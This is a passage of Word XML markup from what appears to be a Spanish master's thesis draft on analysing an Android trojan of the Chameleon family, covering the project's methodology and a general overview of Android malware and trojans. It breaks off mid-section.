      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Anexo A. Documentación del progreso realizado y materiales generados, control de versiones</w:t>
      </w:r>
      <w:r w:rsidR="002B14E1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del trabajo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BAADBB" w14:textId="68C815ED" w:rsidR="00E95A92" w:rsidRPr="000E046D" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Anexo B. Seguimiento del proyecto</w:t>
      </w:r>
      <w:r w:rsidR="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y</w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> cambios </w:t>
      </w:r>
      <w:r w:rsidR="00FE0668">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">efectuados </w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>respecto a</w:t>
      </w:r>
      <w:r w:rsidR="002B14E1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> las planificaciones iniciales</w:t>
      </w:r>
      <w:r w:rsidR="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA7AC69" w14:textId="3B20699D" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="000D0071">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8E0AF0" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36468E60" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc107862672"/>
      <w:bookmarkStart w:id="9" w:name="_Toc170500146"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Capítulo 1: Estudio del problema</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4BD0D603" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25AF0277" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45FE4CB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0" w:name="_1.1__"/>
      <w:bookmarkStart w:id="11" w:name="_Toc107862673"/>
      <w:bookmarkStart w:id="12" w:name="_Toc170500147"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.1   EL CONTEXTO DEL PROBLEMA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="47D31A19" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089CFB57" w14:textId="324543F3" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="004B5735">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En este proyecto se ha llevado a cabo un análisis de</w:t>
      </w:r>
      <w:r w:rsidR="00F702F0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> una</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> muestra de malware Android de tipo troyano</w:t>
      </w:r>
      <w:r w:rsidR="00F702F0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> perteneciente a la familia Chameleon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Se han empleado aproximadamente 3 meses en llevar a cabo la tarea incluyendo las investigaciones iniciales, ya que, a pesar de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ser un tema cercano a las temáticas del máster, no se cuentan con conocimientos extensos</w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en profundidad para la realización del análisis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, especialmente para plataformas móviles como Android. No obstante, algunas asignaturas del título han servido para sentar las bases y permitir avanzar más rápidamente, así como para familiarizarse con algunas de las herramientas a utilizar. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962EC4F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="004B5735">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Para llevar a cabo un análisis en profundidad que identifique los vectores de ataque del malware, así como sus procedimientos y objetivos, se han de realizar los siguientes pasos: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331052EA" w14:textId="7F120724" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Investigación de la literatura existente respecto al</w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tipo de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware</w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> elegido</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">las </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>familias relacionadas</w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, con el fin de conocer su naturaleza y los procedimientos más habituales</w:t>
      </w:r>
      <w:r w:rsidR="00735C24">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que utilizan</w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1449A809" w14:textId="602B87A7" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Análisis estático de la muestra obtenida, que permita entender el funcionamiento interno del malware y las tareas que puede realizar</w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, así como código que pese a no ser </w:t>
      </w:r>
      <w:r w:rsidR="0090253C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">necesariamente </w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ejecutado en las pruebas dinámicas también forma parte de la amenaza</w:t>
      </w:r>
      <w:r w:rsidR="00746365">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, pudiendo ser ejecutado bajo ciertas condiciones especiales</w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0309E" w14:textId="531326AE" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Análisis dinámico del malware en un entorno controlado, que posibilite visualizar y obtener datos acerca del funcionamiento del troyano en un dispositivo Android, que en este caso será una versión virtualizada del sistema</w:t>
      </w:r>
      <w:r w:rsidR="0090253C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301604F3" w14:textId="6B5C4FDE" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Análisis de los resultados obtenidos en las fases anteriores, determinando</w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> las amenazas que presenta el malware </w:t>
      </w:r>
      <w:r w:rsidR="005F11F7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>para</w:t>
      </w:r>
      <w:r w:rsidR="00867BD2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> los sistemas Android, por qué tiene éxito en sus ataques y cuáles son los signos o indicadores de su presencia en un dispositivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C8B92A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7466C2" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576" w:hanging="576"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_1.2__"/>
      <w:bookmarkStart w:id="14" w:name="_Toc107862674"/>
      <w:bookmarkStart w:id="15" w:name="_Toc170500148"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2   EL ESTADO </w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DEL ARTE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="6E970CE5" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD86F80" w14:textId="298DD84C" w:rsidR="00450284" w:rsidRDefault="00450284" w:rsidP="00655831">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En esta sección se hará una introducción al malware desde la perspectiva de Android resultado de la evaluación y revisión de literatura realizada, dividiéndose en </w:t>
      </w:r>
      <w:r w:rsidR="00F50EA1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cinco</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> subsecciones según la </w:t>
      </w:r>
      <w:r w:rsidR="00F50EA1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>temática</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, comenzando por una visión general del malware para la plataforma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38017491" w14:textId="77777777" w:rsidR="00450284" w:rsidRDefault="00450284" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71979C8E" w14:textId="65FBA789" w:rsidR="00382B7B" w:rsidRDefault="00382B7B" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0052242F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Malware en Android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E9D98E" w14:textId="77777777" w:rsidR="00B45097" w:rsidRPr="0052242F" w:rsidRDefault="00B45097" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E11C6C" w14:textId="56959E8E" w:rsidR="009A5BA7" w:rsidRDefault="009A5BA7" w:rsidP="00B45097">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La plataforma Android surgió en 2008 con la llegada al mercado de los primeros dispositivos móviles inteligentes (conocidos popularmente como smartphones). Está basada en el kernel Linux </w:t>
      </w:r>
      <w:r w:rsidR="00F70B04">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y es un proyecto de código abierto liderado por Google, que cuenta hasta el momento con 21 versiones diferentes y una gran fragmentación en lo relativo a estas</w:t>
      </w:r>
      <w:r w:rsidR="00315F90">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004331B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[X]</w:t>
      </w:r>
      <w:r w:rsidR="00F70B04">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Este es uno de los puntos a destacar desde el punto de vista de la seguridad, ya que esta división con dispositivos que cuentan con versiones significantemente diferentes provoca que existan distintos niveles de protección y mitigaciones en función de la fecha de publicación de la versión concreta de Android, así como de las posteriores actualizaciones de seguridad. Asimismo, existen diferentes variantes de Android dentro de las propias versiones, ya que muchos fabricantes optan por personalizar Android para sus dispositivos con el objetivo de ofrecer características adicionales a los usuarios de sus dispositivos u optimizar el sistema operativo para aprovechar de manera más eficiente los recursos de los que estos disponen. Pese a que el sistema de Google es el más popular, grandes fabricantes como Samsung, Xiaomi o Huawei con su propio sistema Android, lo que aumenta aún más la fragmentación y también supone en algunos casos cambios en las políticas y medidas de seguridad aplicadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B63F2EC" w14:textId="5F2EA04A" w:rsidR="00F70B04" w:rsidRDefault="00F70B04" w:rsidP="00B45097">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Hoy en día el sistema Android en sus diferentes versiones engloba a la mayoría de </w:t>
      </w:r>
      <w:r w:rsidR="00C8665A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>los dispositivos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> móviles en el mercado, ya que cuenta con una cuota superior al 70%. Este dato, aunado a la fragmentación previamente mencionada, hace de la plataforma Android el objetivo número uno de los atacantes en lo concerniente a sistemas móviles</w:t>
      </w:r>
      <w:r w:rsidR="00FA40BD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, con iOS en la segunda posición a gran distancia en términos de volumen de ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A16C8" w14:textId="577AE2FC" w:rsidR="00F70B04" w:rsidRDefault="00F70B04" w:rsidP="00B45097">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Pese a la relativa </w:t>
      </w:r>
      <w:r w:rsidR="00C8665A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>irrupción reciente en el mundo de la informática, Android ha sido un blanco de malware desde sus inicios. En 2010 surgió el primer malware específico para Android,</w:t>
      </w:r>
      <w:r w:rsidR="008C7BB3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> aunque ya existía malware para sistemas operativos móviles desde 2004</w:t>
      </w:r>
      <w:r w:rsidR="004331B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X] </w:t>
      </w:r>
      <w:r w:rsidR="00C8665A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y desde entonces el número de amenazas </w:t>
      </w:r>
      <w:r w:rsidR="008C7BB3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">en Android </w:t>
      </w:r>
      <w:r w:rsidR="00C8665A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ha crecido rápidamente</w:t>
      </w:r>
      <w:r w:rsidR="008C7BB3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en comparación </w:t>
      </w:r>
      <w:r w:rsidR="008C7BB3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>con otras plataformas</w:t>
      </w:r>
      <w:r w:rsidR="00C8665A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, aumentando principalmente en volumen, pero también en sofisticación. </w:t>
      </w:r>
      <w:r w:rsidR="004C30D2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Los fabricantes tratan de incluir nuevas medidas de prevención y reducción de riesgos, así como realizar campañas de prevención</w:t>
      </w:r>
      <w:r w:rsidR="00E802AD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, algunas de ellas</w:t>
      </w:r>
      <w:r w:rsidR="004C30D2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en colaboración con organismos públicos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2905C5" w14:textId="0EADF096" w:rsidR="004C30D2" w:rsidRDefault="004C30D2" w:rsidP="00B45097">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">No obstante, el malware en Android sigue siendo una actividad </w:t>
      </w:r>
      <w:r w:rsidR="000E700B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">altamente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lucrativa, no solamente en términos económicos, si no también geopolíticos, como ha sido demostrado por algunos de los últimos ataques de APTs, en los que Android ha sido la plataforma</w:t>
      </w:r>
      <w:r w:rsidR="00E802AD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la finalidad es la exfiltración de datos de carácter confidencial o sensible</w:t>
      </w:r>
      <w:r w:rsidR="00894E12">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A146A6" w14:textId="77777777" w:rsidR="00E802AD" w:rsidRDefault="00E802AD" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E42595" w14:textId="77777777" w:rsidR="004735ED" w:rsidRDefault="004735ED" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD2785B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020250F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Troyanos en Android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F6317" w14:textId="77777777" w:rsidR="00C0328A" w:rsidRPr="0020250F" w:rsidRDefault="00C0328A" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1679419E" w14:textId="77777777" w:rsidR="007D33EA" w:rsidRDefault="00450284" w:rsidP="00C0328A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El malware de tipo troyano es uno de los más populares en términos globales sin tener en cuenta la plataforma, y el sistema Android sigue el patrón. Se estima que entorno a un 30% del malware de Android se puede encuadrar dentro de esta tipología. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06046B52" w14:textId="4C2A8691" w:rsidR="00450284" w:rsidRDefault="00450284" w:rsidP="00C0328A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dentro de las muestras categorizadas como troyanos se pueden encontrar dos modalidades cuando hablamos de Android. La primera de ellas se trata de una aplicación que simula ser legítima, y siendo en esencia una versión modificada de la aplicación a la que trata de suplantar. En esta versión alterada se encuentra el código malicioso que permite al troyano la realización de sus acciones maliciosas. La tasa de éxito de esta tipología de troyano viene dada por su capacidad para emular las características de la aplicación suplantada, tratando de ser una copia casi exacta y en muchos casos contando con gran parte del código de la aplicación original. Para tratar de aumentar las posibilidades de infección, los atacantes suelen elegir aplicaciones populares y conocidas para suplantar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFCAE89" w14:textId="6BFB2773" w:rsidR="00FB3544" w:rsidRDefault="00450284" w:rsidP="00C0328A">
      <w:pPr>
